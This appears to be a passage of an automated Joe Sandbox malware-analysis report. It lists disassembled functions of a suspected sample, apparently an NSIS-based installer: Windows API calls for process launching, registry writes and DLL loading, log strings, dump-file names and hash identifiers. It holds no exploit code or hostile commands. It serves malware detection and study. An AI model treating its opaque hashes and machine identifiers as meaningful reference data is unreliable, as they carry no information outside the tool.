                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                          Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                          • GetSysColor.USER32(?), ref: 004041AF
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                          • SendMessageW.USER32(00000000), ref: 00404251
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                          • SetCursor.USER32(00000000), ref: 004042D2
                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                          • SetCursor.USER32(00000000), ref: 004042F6
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                          • String ID: @%F$N$open
                                          • API String ID: 3928313111-3849437375
                                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                          Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                          • wsprintfA.USER32 ref: 00406B4D
                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                          • String ID: F$%s=%s$NUL$[Rename]
                                          • API String ID: 565278875-1653569448
                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                          • DeleteObject.GDI32(?), ref: 004010F6
                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                          • DeleteObject.GDI32(?), ref: 0040116E
                                          • EndPaint.USER32(?,?), ref: 00401177
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                          Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                          • API String ID: 1641139501-220328614
                                          • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                          • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                          Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                          Strings
                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID: created uninstaller: %d, "%s"
                                          • API String ID: 3294113728-3145124454
                                          • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                          • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                          Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3734993849-2769509956
                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                          Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                          Strings
                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                          • P}a, xrefs: 00402473
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$P}a
                                          • API String ID: 1033533793-2864341759
                                          • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                          • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                          Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                          • GetSysColor.USER32(?), ref: 00403E2B
                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                          • DeleteObject.GDI32(?), ref: 00403E55
                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                          Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                          Strings
                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                          • Exec: command="%s", xrefs: 00402241
                                          • Exec: success ("%s"), xrefs: 00402263
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                          • API String ID: 2014279497-3433828417
                                          • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                          • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                          Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                          • GetMessagePos.USER32 ref: 00404871
                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
